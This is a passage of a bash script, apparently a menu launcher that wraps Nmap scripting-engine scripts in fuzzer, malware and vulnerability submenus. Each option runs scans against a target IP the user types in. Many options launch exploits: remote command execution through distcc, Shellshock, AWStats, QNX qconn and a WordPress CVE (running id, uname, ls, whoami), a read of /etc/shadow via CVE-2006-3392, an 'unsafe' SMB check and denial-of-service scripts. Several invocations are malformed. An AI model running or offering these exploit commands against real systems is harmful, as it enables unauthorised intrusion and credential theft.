- echo -e $white" [$okegreen"01"$white]$cyan File dns-fuzz "
- echo -e $white" [$okegreen"02"$white]$cyan File http-form-fuzzer "
- echo -e $white" [$okegreen"03"$white]$cyan File http-phpself-xss "
- echo -e $white" [$okegreen"04"$white]$cyan Back "
- echo -e " "
- echo -n -e $red' \033[4mScreetsec@nse-fuzzer:\033[0m>> '; tput sgr0 #insert your choice
- read win
- if test $win == '1'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU --script dns-fuzz --script-args timelimit=2h $ip &
- elif test $win == '2'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip &
- elif test $win == '3'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=http-phpself-xss -p80 $ip &
- elif test $win == '4'
- then
- nse
- else
- echo ""
- echo -e $okegreen " Incorrect Number"
- fi
- echo ""
- echo ""
- echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- menu
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- fuzzer
- fi
- }
- function malware () {
- clear
- echo
- echo
- echo -e $white" [$okegreen"01"$white]$cyan auth-spoof "
- echo -e $white" [$okegreen"02"$white]$cyan dns-zeustracker "
- echo -e $white" [$okegreen"03"$white]$cyan ftp-proftpd-backdoor "
- echo -e $white" [$okegreen"04"$white]$cyan ftp-vsftpd-backdoor "
- echo -e $white" [$okegreen"05"$white]$cyan http-google-malware "
- echo -e $white" [$okegreen"06"$white]$cyan http-malware-host "
- echo -e $white" [$okegreen"07"$white]$cyan http-virustotal "
- echo -e $white" [$okegreen"08"$white]$cyan irc-unrealircd-backdoor "
- echo -e $white" [$okegreen"09"$white]$cyan smtp-strangeport "
- echo -e $white" [$okegreen"10"$white]$cyan back "
- echo
- echo -n -e $red' \033[4mScreetsec@nse-malware:\033[0m>> '; tput sgr0 #insert your choice
- read malw
- if test $malw == '1'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=auth-spoof $ip &
- elif test $malw == '2'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sn -PN --script=dns-zeustracker $ip &
- elif test $malw == '3'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script ftp-proftpd-backdoor -p 21 $ip &
- elif test $malw == '4'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script ftp-vsftpd-backdoor -p 21 $ip &
- elif test $malw == '5'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-google-malware $ip &
- elif test $malw == '6'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=http-malware-host $ip &
- elif test $malw == '7'
- then
- echo
- echo -ne $okegreen " an API key acquired from the virustotal web page: " ; tput sgr0
- read key
- echo -ne $okegreen " a SHA1, SHA256, MD5 checksum of a file to check: " ; tput sgr0
- read sum
- $urxvt --script http-virustotal --script-args="http-virustotal.apikey="$key",http-virustotal.checksum="$sum"" &
- elif test $malw == '8'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt-sV --script=irc-unrealircd-backdoor $ip &
- elif test $malw == '9'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=smtp-strangeport $ip &
- elif test $malw == '10'
- then
- nse
- else
- echo ""
- echo -e $okegreen " Incorrect Number"
- fi
- echo ""
- echo ""
- echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- menu
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- malware
- fi
- }
- #!/bin/bash
- function vuln () {
- clear
- echo
- echo -e $white" [$okegreen"01"$white]$cyan afp-path-vuln "
- echo -e $white" [$okegreen"02"$white]$cyan broadcast-avahi-dos "
- echo -e $white" [$okegreen"03"$white]$cyan clamav-exec "
- echo -e $white" [$okegreen"04"$white]$cyan distcc-cve2004-2687 "
- echo -e $white" [$okegreen"05"$white]$cyan dns-update "
- echo -e $white" [$okegreen"06"$white]$cyan firewall-bypass "
- echo -e $white" [$okegreen"07"$white]$cyan ftp-libopie "
- echo -e $white" [$okegreen"08"$white]$cyan ftp-proftpd-backdoor "
- echo -e $white" [$okegreen"09"$white]$cyan ftp-vsftpd-backdoor "
- echo -e $white" [$okegreen"10"$white]$cyan ftp-vuln-cve2010-4221 "
- echo -e $white" [$okegreen"11"$white]$cyan http-adobe-coldfusion-apsa1301 "
- echo -e $white" [$okegreen"12"$white]$cyan http-aspnet-debug "
- echo -e $white" [$okegreen"13"$white]$cyan http-avaya-ipoffice-users "
- echo -e $white" [$okegreen"14"$white]$cyan http-awstatstotals-exec "
- echo -e $white" [$okegreen"15"$white]$cyan http-axis2-dir-traversal "
- echo -e $white" [$okegreen"16"$white]$cyan http-cross-domain-policy "
- echo -e $white" [$okegreen"17"$white]$cyan http-csrf "
- echo -e $white" [$okegreen"18"$white]$cyan http-dlink-backdoor "
- echo -e $white" [$okegreen"19"$white]$cyan http-dombased-xss "
- echo -e $white" [$okegreen"20"$white]$cyan http-enum "
- echo -e $white" [$okegreen"21"$white]$cyan http-fileupload-exploiter "
- echo -e $white" [$okegreen"22"$white]$cyan http-frontpage-login "
- echo -e $white" [$okegreen"23"$white]$cyan http-git "
- echo -e $white" [$okegreen"24"$white]$cyan http-huawei-hg5xx-vuln "
- echo -e $white" [$okegreen"25"$white]$cyan http-iis-webdav-vuln "
- echo -e $white" [$okegreen"26"$white]$cyan http-internal-ip-disclosure "
- echo -e $white" [$okegreen"27"$white]$cyan http-litespeed-sourcecode-download "
- echo -e $white" [$okegreen"28"$white]$cyan http-majordomo2-dir-traversal "
- echo -e $white" [$okegreen"29"$white]$cyan http-method-tamper "
- echo -e $white" [$okegreen"30"$white]$cyan http-passwd "
- echo -e $white" [$okegreen"31"$white]$cyan http-phpmyadmin-dir-traversal "
- echo -e $white" [$okegreen"32"$white]$cyan http-phpself-xss "
- echo -e $white" [$okegreen"33"$white]$cyan http-shellshock "
- echo -e $white" [$okegreen"34"$white]$cyan http-slowloris-check "
- echo -e $white" [$okegreen"35"$white]$cyan http-sql-injection "
- echo -e $white" [$okegreen"36"$white]$cyan http-stored-xss "
- echo -e $white" [$okegreen"37"$white]$cyan http-tplink-dir-traversal "
- echo -e $white" [$okegreen"38"$white]$cyan http-trace "
- echo -e $white" [$okegreen"39"$white]$cyan http-vmware-path-vuln "
- echo -e $white" [$okegreen"40"$white]$cyan http-vuln-cve2006-3392 "
- echo -e $white" [$okegreen"41"$white]$cyan http-vuln-cve2010-0738 "
- echo -e $white" [$okegreen"42"$white]$cyan http-vuln-cve2010-2861 "
- echo -e $white" [$okegreen"43"$white]$cyan http-vuln-cve2011-3192 "
- echo -e $white" [$okegreen"44"$white]$cyan http-vuln-cve2011-3368 "
- echo -e $white" [$okegreen"45"$white]$cyan http-vuln-cve2012-1823 "
- echo -e $white" [$okegreen"46"$white]$cyan http-vuln-cve2013-0156 "
- echo -e $white" [$okegreen"47"$white]$cyan http-vuln-cve2013-6786 "
- echo -e $white" [$okegreen"48"$white]$cyan http-vuln-cve2013-7091 "
- echo -e $white" [$okegreen"49"$white]$cyan http-vuln-cve2014-2126 "
- echo -e $white" [$okegreen"50"$white]$cyan http-vuln-cve2014-2127 "
- echo -e $white" [$okegreen"51"$white]$cyan http-vuln-cve2014-2128 "
- echo -e $white" [$okegreen"52"$white]$cyan http-vuln-cve2014-2129 "
- echo -e $white" [$okegreen"53"$white]$cyan http-vuln-cve2014-3704 "
- echo -e $white" [$okegreen"54"$white]$cyan http-vuln-cve2014-8877 "
- echo -e $white" [$okegreen"55"$white]$cyan http-vuln-cve2015-1427 "
- echo -e $white" [$okegreen"56"$white]$cyan http-vuln-cve2015-1635 "
- echo -e $white" [$okegreen"57"$white]$cyan http-vuln-misfortune-cookie "
- echo -e $white" [$okegreen"58"$white]$cyan http-vuln-wnr1000-creds "
- echo -e $white" [$okegreen"59"$white]$cyan http-wordpress-users "
- echo -e $white" [$okegreen"60"$white]$cyan ipmi-cipher-zero "
- echo -e $white" [$okegreen"61"$white]$cyan irc-botnet-channels "
- echo -e $white" [$okegreen"62"$white]$cyan irc-unrealircd-backdoor "
- echo -e $white" [$okegreen"63"$white]$cyan mysql-vuln-cve2012-2122 "
- echo -e $white" [$okegreen"64"$white]$cyan netbus-auth-bypass "
- echo -e $white" [$okegreen"65"$white]$cyan qconn-exec "
- echo -e $white" [$okegreen"66"$white]$cyan rdp-vuln-ms12-020 "
- echo -e $white" [$okegreen"67"$white]$cyan rmi-vuln-classloader "
- echo -e $white" [$okegreen"68"$white]$cyan samba-vuln-cve-2012-1182 "
- echo -e $white" [$okegreen"69"$white]$cyan smb-vuln-conficker "
- echo -e $white" [$okegreen"70"$white]$cyan smb-vuln-cve2009-3103 "
- echo -e $white" [$okegreen"71"$white]$cyan smb-vuln-ms06-025 "
- echo -e $white" [$okegreen"72"$white]$cyan smb-vuln-ms07-029 "
- echo -e $white" [$okegreen"73"$white]$cyan smb-vuln-ms08-067 "
- echo -e $white" [$okegreen"74"$white]$cyan smb-vuln-ms10-054 "
- echo -e $white" [$okegreen"75"$white]$cyan smb-vuln-ms10-061 "
- echo -e $white" [$okegreen"76"$white]$cyan smb-vuln-regsvc-dos "
- echo -e $white" [$okegreen"77"$white]$cyan smtp-vuln-cve2010-4344 "
- echo -e $white" [$okegreen"78"$white]$cyan smtp-vuln-cve2011-1720 "
- echo -e $white" [$okegreen"79"$white]$cyan smtp-vuln-cve2011-1764 "
- echo -e $white" [$okegreen"80"$white]$cyan ssl-ccs-injection "
- echo -e $white" [$okegreen"81"$white]$cyan ssl-cert-intaddr "
- echo -e $white" [$okegreen"82"$white]$cyan ssl-dh-params "
- echo -e $white" [$okegreen"83"$white]$cyan ssl-heartbleed "
- echo -e $white" [$okegreen"84"$white]$cyan ssl-known-key "
- echo -e $white" [$okegreen"85"$white]$cyan ssl-poodle "
- echo -e $white" [$okegreen"86"$white]$cyan sslv2-drown "
- echo -e $white" [$okegreen"87"$white]$cyan supermicro-ipmi-conf "
- echo -e $white" [$okegreen"88"$white]$cyan wdb-version "
- echo -e $white" [$okegreen"89"$white]$cyan back "
- echo -e " "
- echo -n -e $red' \033[4mScreetsec@nse-vuln:\033[0m>> '; tput sgr0 #insert your choice
- read vuln
- if test $vuln == '1'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=afp-path-vuln $ip &
- elif test $vuln == '2'
- then
- echo
- $urxvt --script=broadcast-avahi-dos &
- elif test $vuln == '3'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script clamav-exec $ip &
- elif test $vuln == '4'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 3632 $ip --script distcc-exec --script-args="distcc-exec.cmd='id'" &
- elif test $vuln == '5'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU -p 53 --script=dns-update --script-args=dns-update.hostname=foo.example.com,dns-update.ip=192.0.2.1 $ip &
- elif test $vuln == '6'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script firewall-bypass --script-args firewall-bypass.helper="ftp", firewall-bypass.targetport=22 $ip &
- elif test $vuln == '7'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=ftp-libopie $ip &
- elif test $vuln == '8'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script ftp-proftpd-backdoor -p 21 $ip &
- elif test $vuln == '9'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script ftp-vsftpd-backdoor -p 21 $ip &
- elif test $vuln == '10'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0
- read port
- $urxvt --script ftp-vuln-cve2010-4221 -p $port $ip &
- elif test $vuln == '11'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-adobe-coldfusion-apsa1301 --script-args basepath=/cf/adminapi/ $ip &
- elif test $vuln == '12'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-debug --script-args http-aspnet-debug.path=/path $ip &
- elif test $vuln == '13'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-avaya-ipoffice-users $ip &
- elif test $vuln == '14'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' $ip &
- elif test $vuln == '15'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-axis2-dir-traversal $ip &
- elif test $vuln == '16'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-crossdomainxml --script-args http.domain-lookup=true $ip &
- elif test $vuln == '17'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-csrf.nse $ip &
- elif test $vuln == '18'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-dlink-backdoor $ip &
- elif test $vuln == '19'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-dombased-xss.nse $ip &
- elif test $vuln == '20'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=http-enum $ip &
- elif test $vuln == '21'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-fileupload-exploiter.nse $ip &
- elif test $vuln == '22'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt $ip -p 80 --script=http-frontpage-login &
- elif test $vuln == '23'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt sV -sC $ip &
- elif test $vuln == '24'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV http-huawei-hg5xx-vuln $ip &
- elif test $vuln == '25'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-iis-webdav-vuln -p 80,8080 $ip &
- elif test $vuln == '26'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-internal-ip-disclosure --script-args http-internal-ip-disclosure.path=/path $ip &
- elif test $vuln == '27'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80,8080 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php $ip &
- elif test $vuln == '28'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-majordomo2-dir-traversal $ip &
- elif test $vuln == '29'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-method-tamper --script-args 'http-method-tamper.paths={/protected/db.php,/protected/index.php}' $ip &
- elif test $vuln == '30'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-passwd --script-args http-passwd.root=/test/ $ip &
- elif test $vuln == '31'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-phpmyadmin-dir-traversal $ip &
- elif test $vuln == '32'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-self-xss $ip &
- elif test $vuln == '33'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls $ip &
- elif test $vuln == '34'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-slowloris-check $ip &
- elif test $vuln == '35'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=http-sql-injection $ip &
- elif test $vuln == '36'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 80 --script http-stored-xss.nse $ip &
- elif test $vuln == '37'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn $ip &
- elif test $vuln == '38'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-trace -d $ip &
- elif test $vuln == '39'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-vmware-path-vuln -p80,443,8222,8333 $ip &
- elif test $vuln == '40'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow $ip &
- elif test $vuln == '41'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' $ip &
- elif test $vuln == '42'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-vuln-cve2010-2861 $ip &
- elif test $vuln == '43'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-vuln-cve2011-3192.nse [--script-args http-vuln-cve2011-3192.hostname=nmap.scanme.org] -pT:80,443 $ip &
- elif test $vuln == '44'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-vuln-cve2011-3368 $ip &
- elif test $vuln == '45'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-vuln-cve2012-1823 $ip &
- elif test $vuln == '46'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-vuln-cve2013-0156 $ip &
- elif test $vuln == '47'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-rompager-xss $ip &
- elif test $vuln == '48'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p80 --script http-vuln-cve2013-7091 --script-args http-vuln-cve2013-7091=/ZimBra $ip &
- elif test $vuln == '49'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 443 --script http-vuln-cve2014-2126 $ip &
- elif test $vuln == '50'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 443 --script http-vuln-cve2014-2127 $ip &
- elif test $vuln == '51'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 443 --script http-vuln-cve2014-2128 $ip &
- elif test $vuln == '52'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 443 --script http-vuln-cve2014-2129 $ip &
- elif test $vuln == '53'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri="/drupal",http-vuln-cve2014-3704.cleanup=false $ip &
- elif test $vuln == '54'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" $ip &
- elif test $vuln == '55'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=http-vuln-cve2015-1427 --script-args command= 'ls' $ip &
- elif test $vuln == '56'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-vuln-cve2015-1635 --script-args uri='/anotheruri/' $ip &
- elif test $vuln == '57'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt $ip -p 7547 --script=http-vuln-misfortune-cookie &
- elif test $vuln == '58'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-vuln-wnr1000-creds $ip -p 80 &
- elif test $vuln == '59'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script http-wordpress-users --script-args limit=50 $ip &
- elif test $vuln == '60'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU --script ipmi-cipher-zero -p 623 $ip &
- elif test $vuln == '61'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 6667 --script=irc-botnet-channels $ip &
- elif test $vuln == '62'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=irc-unrealircd-backdoor $ip &
- elif test $vuln == '63'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script mysql-vuln-cve2012-2122 $ip &
- elif test $vuln == '64'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 12345 --script netbus-auth-bypass $ip &
- elif test $vuln == '65'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script qconn-exec --script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" -p $port $ip &
- elif test $vuln == '66'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=rdp-ms12-020 -p 3389 $ip &
- elif test $vuln == '67'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=rmi-vuln-classloader -p 1099 $ip &
- elif test $vuln == '68'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=samba-vuln-cve-2012-1182 -p 139 $ip &
- elif test $vuln == '69'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU --script smb-vuln-conficker.nse -p T:139 $ip &
- elif test $vuln == '70'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU --script smb-vuln-cve2009-3103.nse -p U:137,T:139 $ip &
- elif test $vuln == '71'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU --script smb-vuln-ms06-025.nse -p U:137,T:139 $ip &
- elif test $vuln == '72'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU --script smb-vuln-ms07-029.nse -p U:137,T:139 $ip &
- elif test $vuln == '73'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU --script smb-vuln-ms08-067.nse -p U:137 $ip &
- elif test $vuln == '74'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 445 $ip --script=smb-vuln-ms10-054 --script-args unsafe &
- elif test $vuln == '75'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 445 $ip --script=smb-vuln-ms10-061 &
- elif test $vuln == '76'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU --script smb-vuln-regsvc-dos.nse -p U:137,T:139 $ip &
- elif test $vuln == '77'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 $ip &
- elif test $vuln == '78'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=smtp-vuln-cve2011-1720 --script-args='smtp.domain=<domain>' -pT:25,465,587 $ip &
- elif test $vuln == '79'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script=smtp-vuln-cve2011-1764 -pT:25,465,587 $ip &
- elif test $vuln == '80'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 443 --script ssl-ccs-injection $ip &
- elif test $vuln == '81'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 443 --script ssl-cert-intaddr $ip &
- elif test $vuln == '82'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script ssl-dh-params $ip &
- elif test $vuln == '83'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p 443 --script ssl-heartbleed $ip &
- elif test $vuln == '84'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt --script ssl-known-key -p 443 $ip &
- elif test $vuln == '85'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --version-light --script ssl-poodle -p 443 $ip &
- elif test $vuln == '86'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sV --script=sslv2-drown $ip &
- elif test $vuln == '87'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -p49152 --script supermicro-ipmi-conf $ip &
- elif test $vuln == '88'
- then
- echo
- echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
- read ip
- $urxvt -sU -p 17185 --script wdb-version $ip &
- elif test $vuln == '89'
- then
- nse
- else
- echo ""
- echo -e $okegreen " Incorrect Number"
- fi
- echo ""
- echo ""
- echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
- read back
- if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
- then
- clear
- menu
- elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
- then
- vuln
- fi
- }
- function nse () {
- clear
- echo -e $okegreen " "
- echo " ) * ( ( ( ( ( ";
- echo " ( /( ( \ ( )\ ) )\ ) ( )\ ))\ ))\ ) * ) ";
- echo " )\()))\))( )\ (()/( (()/( )\ (()/(()/(()/(\ ) /( ";
- echo "((_)\((_)()((((_)( /(_)) /(_)|((_) /(_))(_))(_))( )(_)) ";
- echo " _((_|_()((_)\ _ )\(_)) (_)) )\___(_))(_))(_)) (_(_()) ";
- echo "| \| | \/ (_)_\(_) _ \ / __((/ __| _ \_ _| _ \|_ _| ";
- echo "| .\ | |\/| |/ _ \ | _/ \__ \| (__| /| || _/ | | ";
- echo "|_|\_|_| |_/_/ \_\|_| |___/ \___|_|_\___|_| |_| ";
- echo " ";
- echo -e $red" Nmap Script Engine - Advanced Scanning with Nmap Script "
- echo -e $white " "
- echo -e $white" [$okegreen"01"$white]$cyan auth-category "
- echo -e $white" [$okegreen"02"$white]$cyan broadcast-category "
- echo -e $white" [$okegreen"03"$white]$cyan brute-category "
- echo -e $white" [$okegreen"04"$white]$cyan exploit-category "
- echo -e $white" [$okegreen"05"$white]$cyan fuzzer-category "
- echo -e $white" [$okegreen"06"$white]$cyan malware-category "
- echo -e $white" [$okegreen"07"$white]$cyan vuln-category "
- echo -e $white" [$okegreen"08"$white]$cyan back to menu "
- echo
- echo -n -e $red' \033[4mScreetsec@nse:\033[0m>> '; tput sgr0 #insert your choice
- read ceh
- if test $ceh == '1'
- then
- clear
- auth
- elif test $ceh == '2'
- then
- clear
- brd
- elif test $ceh == '3'
- then
- clear
- brutense
- elif test $ceh == '4'
